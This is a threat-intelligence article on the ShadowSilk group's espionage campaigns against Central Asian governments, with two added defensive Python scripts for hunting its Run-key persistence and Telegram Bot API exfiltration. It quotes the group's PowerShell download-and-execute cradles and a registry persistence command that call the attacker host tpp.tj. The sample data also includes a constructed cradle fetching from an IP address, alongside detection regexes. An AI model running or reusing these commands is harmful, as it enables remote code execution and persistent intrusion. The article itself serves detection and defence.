ShadowSilk Leveraging Penetration-Testing Tools, Public Exploits to Attack Organizations

ShadowSilk first surfaced in late 2023 as a sophisticated threat cluster targeting government entities across Central Asia and the broader APAC region.

Exploiting known public vulnerabilities and widely available penetration-testing frameworks, the group orchestrates data exfiltration campaigns with a high degree of automation and stealth.

Initial access was gained through phishing emails carrying password-protected archives; once the archived file was executed, it dropped a Telegram-based backdoor that established a covert command-and-control channel.

The rapid proliferation of ShadowSilk operations prompted heightened scrutiny across regional security teams.

In early 2025, Group-IB analysts identified renewed ShadowSilk infrastructure and a burst of new indicators of compromise, including updated Telegram bots and repurposed public exploits such as CVE-2024-27956 and CVE-2018-7602.

Researchers noted that the adversary’s toolkit blended open-source scanners like sqlmap and fscan with custom Telegram bot scripts, creating a versatile platform capable of reconnaissance, lateral movement, and bulk data theft.

This hybrid approach allowed ShadowSilk to alternate seamlessly between freely available tools and bespoke malware, complicating detection and response efforts.

By mid-2025, the group's impact was undeniable: at least 35 government networks had suffered data breaches, and a forensic image of a ShadowSilk server revealed operators working in several languages and an elaborate set of web-panel control suites.

Data stolen from victims included mail server dumps, administrative credentials, and sensitive intelligence, exfiltrated in daily ZIP archives.

The sophistication of these campaigns underscores ShadowSilk’s deliberate evolution from a small phishing-based actor into a persistent, multi-stage threat capable of sustaining prolonged intrusions.

A screenshot of a phishing email from ShadowSilk (Source – Group-IB)

Group-IB researchers noted that ShadowSilk’s operators maintain two sub-groups—one primarily Russian-speaking and the other Chinese-speaking—working in parallel yet sharing virtual assets.

Analysis of keyboard layouts, desktop screenshots, and Telegram command histories confirmed this bilingual operational model. Despite different tooling preferences, both factions converge on the same objective: covertly harvest sensitive information and evade traditional security controls.

Infection Mechanism and Persistence

ShadowSilk’s infection chain begins with a lure email delivering a ZIP archive that masquerades as an official report or vendor bulletin.

Once the archive is extracted and rev.exe is run, the PowerShell-based payload connects to a hardcoded URL such as https://tpp.tj/BossMaster.txt, invoking:

powershell -ExecutionPolicy Bypass -Command "(Invoke-WebRequest https://tpp.tj/BossMaster.txt).Content | iex"
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v WinUpTask /t REG_SZ /d 'powershell -ExecutionPolicy Bypass -command "(Invoke-WebRequest https://tpp.tj/iap.txt).Content | iex"' /f

The first command fetches the primary backdoor and runs it in memory with Invoke-Expression, so nothing is written to disk at that stage. The second writes a value named WinUpTask under HKCU\Software\Microsoft\Windows\CurrentVersion\Run, so that a further script (iap.txt) is downloaded and executed at every logon, giving persistence across reboots without elevated privileges.
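As an added example, not Group-IB's or ShadowSilk's code, the following Python script shows how a defender might triage Run-key autostart values exported from endpoints for the download-cradle shape quoted above. The registry entries it scans are constructed samples: the WinUpTask entry mirrors the one on the page, while the IP 203.0.113.5, the other value names and the paths are made up. It goes beyond the single entry on the page by also recognising the common PowerShell aliases and parameter abbreviations (iwr, irm, IEX, -ep, -w hidden).

```python
import re

# Constructed Run-key entries (hive path, value name, value data). They are made-up
# telemetry modelled on the persistence entry quoted above, not data from Group-IB.
SAMPLE_AUTORUNS = [
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "WinUpTask",
     'powershell -ExecutionPolicy Bypass -command "(Invoke-WebRequest https://tpp.tj/iap.txt).Content | iex"'),
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "OneDrive",
     r'"C:\Users\u\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    (r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run", "Updater",
     "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.txt')\""),
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "Sync",
     r'powershell -ExecutionPolicy Bypass -File C:\Tools\sync.ps1'),
]

# Each indicator is (name, regex). Matching ignores case and accepts the usual
# PowerShell aliases (iwr, irm, iex) and parameter abbreviations (-ep, -ex, -w, -nop).
INDICATORS = [
    ("exec_policy_bypass", re.compile(r"-(?:ex(?:ec(?:utionpolicy)?)?|ep)\s+bypass", re.I)),
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("no_profile", re.compile(r"-nop(?:rofile)?\b", re.I)),
    ("download_cradle", re.compile(
        r"invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|net\.webclient|download(?:string|file)", re.I)),
    ("in_memory_exec", re.compile(r"\biex\b|invoke-expression", re.I)),
]
# URLs are pulled out so they can be pivoted on as network indicators.
URL_RE = re.compile(r"https?://[^\s\"'()]+", re.I)


def analyse_autorun(value: str) -> dict:
    """Return the indicators and URLs found in one Run-key command string."""
    hits = [name for name, rx in INDICATORS if rx.search(value)]
    urls = URL_RE.findall(value)
    # A remote fetch piped into Invoke-Expression is the download-cradle shape;
    # that combination alone is enough to escalate, whatever the other flags say.
    if "download_cradle" in hits and "in_memory_exec" in hits:
        severity = "high"
    elif hits:
        severity = "medium"
    else:
        severity = "none"
    return {"severity": severity, "indicators": hits, "urls": urls}


def scan_autoruns(entries):
    """Apply analyse_autorun to (hive, name, data) tuples and return only flagged entries."""
    findings = []
    for hive, name, data in entries:
        result = analyse_autorun(data)
        if result["severity"] != "none":
            findings.append({"key": f"{hive}\\{name}", **result})
    return findings


if __name__ == "__main__":
    for f in scan_autoruns(SAMPLE_AUTORUNS):
        print(f"[{f['severity']}] {f['key']}: {', '.join(f['indicators'])} urls={f['urls']}")
```

On a live fleet the same function can be fed the output of `reg query` or an Autoruns export; the useful part is the severity split, since `-ExecutionPolicy Bypass -File` on its own is common in legitimate admin tooling, whereas a web fetch piped straight into `iex` almost never is.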

The contents of the file /www/html/gramm.ps1 (Source – Group-IB)

The second-stage script, /www/html/gramm.ps1, implements a Telegram bot loop that polls the Bot API for incoming commands, executes arbitrary shell commands, and uploads the output or requested files directly to the attacker's Telegram chat.

The persistence mechanism leverages both registry autoruns and scheduled tasks. ShadowSilk routinely deploys a minimalistic downloader that fetches additional modules—Metasploit payloads, Cobalt Strike beacons, or custom RAT executables—through the same Telegram channel.

Because the backdoor talks only to Telegram's Bot API over HTTPS, its traffic is destined for a well-known and widely allowed domain. Controls that flag connections to unknown hosts or unusual TCP ports see nothing out of the ordinary, and the command-and-control traffic blends into legitimate bot interactions.
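The network side of this tradecraft can still be hunted in proxy or TLS-inspection logs: a Bot API URL carries the bot token in its path, a polling backdoor calls getUpdates on a fixed cadence, and stolen files leave via sendDocument. The script below is added here as an example and is not part of the original article or of Group-IB's research; it parses constructed proxy log lines (the hostnames, process names, bot id and token are all made up) and summarises Bot API activity per host. Whether this level of detail is visible at all depends on TLS inspection; without it only the SNI api.telegram.org is observable and the per-method breakdown is unavailable.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed proxy log lines (not real telemetry): "timestamp host process url".
# The bot id and token are made up; a real token is a numeric id, a colon and a
# string of roughly 35 characters, and it appears in every Bot API URL path.
SAMPLE_PROXY_LOG = """\
2025-06-02T08:00:00Z ws-041 powershell.exe https://api.telegram.org/bot123456789:AAExampleTokenValue000000000000000/getUpdates?offset=41&timeout=30
2025-06-02T08:00:31Z ws-041 powershell.exe https://api.telegram.org/bot123456789:AAExampleTokenValue000000000000000/getUpdates?offset=42&timeout=30
2025-06-02T08:01:02Z ws-041 powershell.exe https://api.telegram.org/bot123456789:AAExampleTokenValue000000000000000/sendDocument
2025-06-02T08:01:33Z ws-041 powershell.exe https://api.telegram.org/bot123456789:AAExampleTokenValue000000000000000/getUpdates?offset=43&timeout=30
2025-06-02T08:05:10Z ws-077 Telegram.exe https://web.telegram.org/k/
2025-06-02T08:06:00Z ws-077 chrome.exe https://core.telegram.org/bots/api
"""

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)$")
# Only Bot API calls carry "/bot<id>:<token>/<method>"; ordinary Telegram client
# or web traffic does not, which keeps legitimate users out of the findings.
BOT_API_RE = re.compile(r"^https://api\.telegram\.org/bot(\d+):([A-Za-z0-9_-]{30,})/([A-Za-z]+)")
# Bot API methods that move data out of the host, as opposed to polling for commands.
EXFIL_METHODS = {"sendDocument", "sendPhoto", "sendVideo", "sendAudio"}


def parse_bot_api_calls(log_text: str) -> list:
    """Return one dict per proxy line that hits the Telegram Bot API with an embedded token."""
    calls = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, host, proc, url = m.groups()
        api = BOT_API_RE.match(url)
        if not api:
            continue
        bot_id, token, method = api.groups()
        calls.append({"ts": datetime.fromisoformat(ts.replace("Z", "+00:00")),
                      "host": host, "process": proc, "bot_id": bot_id,
                      "token": token, "method": method})
    return calls


def summarise_by_host(calls: list) -> dict:
    """Group Bot API calls per host: calling processes, bot ids, polling cadence and uploads."""
    per_host = defaultdict(list)
    for c in calls:
        per_host[c["host"]].append(c)
    findings = {}
    for host, hcalls in per_host.items():
        polls = [c["ts"] for c in hcalls if c["method"] == "getUpdates"]
        gaps = [(b - a).total_seconds() for a, b in zip(polls, polls[1:])]
        findings[host] = {
            "processes": sorted({c["process"] for c in hcalls}),
            "bot_ids": sorted({c["bot_id"] for c in hcalls}),
            "poll_count": len(polls),
            # A steady mean gap (here about half a minute) is the beaconing signature.
            "mean_poll_gap_s": sum(gaps) / len(gaps) if gaps else None,
            "uploads": sum(1 for c in hcalls if c["method"] in EXFIL_METHODS),
        }
    return findings


if __name__ == "__main__":
    for host, f in summarise_by_host(parse_bot_api_calls(SAMPLE_PROXY_LOG)).items():
        print(host, f)
```

The process column is the strongest single signal: a Bot API call from powershell.exe, rather than from a messaging client or a browser, has no benign explanation on a government workstation. The recovered token is also actionable, since it identifies the attacker's bot and can be shared as an indicator with other defenders.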

Through this dual-stage infection and persistent backdoor, ShadowSilk maintains long-term access, enabling data collection, credential dumping, and systematic exfiltration of archived user documents to attacker-controlled endpoints.

About Cybernoz

Security researcher and threat analyst with expertise in malware analysis and incident response.